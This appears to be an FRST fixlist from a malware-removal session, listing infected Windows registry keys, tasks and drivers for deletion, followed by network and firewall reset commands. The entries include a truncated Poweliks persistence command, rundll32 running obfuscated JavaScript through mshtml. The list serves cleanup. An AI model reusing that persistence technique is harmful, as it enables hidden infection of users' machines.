HKU\S-1-5-21-3898602812-2674449479-855244470-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
SearchScopes: HKU\.DEFAULT -> {F42D4712-298F-4502-8668-7B9940C3FB00} URL = http://www.basicseek...s={searchTerms}
SearchScopes: HKU\S-1-5-21-3898602812-2674449479-855244470-1003 -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = http://search.xfinit...q={searchTerms}
BHO-x32: Updater For XFIN_PORTAL -> {bb46be07-13eb-4c49-b0f0-fc78b9ea4983} -> C:\Program Files (x86)\xfin_portal\auxi\comcastAu.dll No File
2014-11-18 14:17 - 2014-11-18 14:17 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-18 14:31 - 2012-12-15 02:58 - 00000000 ____D () C:\Users\Default\AppData\Local\SoftThinks
2014-11-18 14:31 - 2012-12-15 02:58 - 00000000 ____D () C:\Users\Default User\AppData\Local\SoftThinks
CustomCLSID: HKU\S-1-5-21-3898602812-2674449479-855244470-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3898602812-2674449479-855244470-1003_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\crypt32.dll (Microsoft Corporation)
Task: {3D0D98EA-3511-4AED-BAA0-360C12B4871C} - System32\Tasks\Test TimeTrigger => C:\Users\Grandma\AppData\Local\Temp\Runner.exe <==== ATTENTION
S1 AntiLog32; \??\C:\Windows\system32\drivers\AntiLog64.sys [X]
S3 keycrypt; system32\DRIVERS\KeyCrypt64.sys [X]
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
EmptyTemp:
CMD: bitsadmin /reset /allusers